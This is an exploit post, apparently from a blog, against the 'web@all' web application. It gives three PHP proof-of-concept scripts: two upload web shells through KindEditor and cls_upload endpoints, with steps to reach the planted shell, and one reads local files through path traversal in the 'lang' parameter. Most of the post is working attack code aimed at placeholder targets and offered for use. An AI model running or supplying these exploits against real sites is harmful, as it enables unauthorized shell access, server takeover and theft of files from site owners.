web@all - Local File Inclusion
<!-- Shell Upload .PHP -->
<?php
$uploadfile="inj3ct0r.php";
$ch = curl_init("http://[Target]/[path]/my/kindeditor/php/upload_json.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('imgFile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
[*] 0r Use TemperDATA ->(/[path]/my/kindeditor/php/upload_json.php) and POST u'R Sh3lL
[!] Change inj3ct0r.php -> t0 U'r Sh3lL '_*
[+] Access Shell http://[Target]/[path]/file/[ Ym 'dir]/{raW-File-Name}.php
<!-- Proof of Concept ,p0c(2) -->
<!-- Shell Upload .GIF -->
<?php
$uploadfile="inj3ct0r.gif";
$ch = curl_init("http://[Target]/[path]/inc/cls_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('tmp_name'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
[*] 0r Use TemperDATA ->(/[path]/inc/cls_upload.php) and POST u'R Sh3lL
[!] Change inj3ct0r.gif -> t0 U'r Sh3lL '_*
[+] Access Shell http://[Target]/[path]/file/temp/[ Ym 'dir]/{raW-File-Name}.gif
<!-- Proof of Concept ,p0c(3) -->
<!-- Local File Include -->
<?php
$lfi =
curl_init("http://[Target]/[path]/my/kindeditor/index.php");
curl_setopt($lfi, CURLOPT_POST, true);
curl_setopt($lfi, CURLOPT_POSTFIELDS,
array('lang'=>"../../../../../../../../[ LFI ]"));
curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($lfi);
curl_close($lfi);
print "$postResult";
?>
[*] 0r Use TemperDATA ->(/[path]/my/kindeditor/index.php) POST and GET s0me Local File's
# Please comment, question and criticize politely
# Here you can insert Links in the comments field
# But will I moderate or review each comment first
# Do not let your comment contain SPAM.
# Thank You - Regards Muhammad Sobri Maulana
EmoticonEmoticon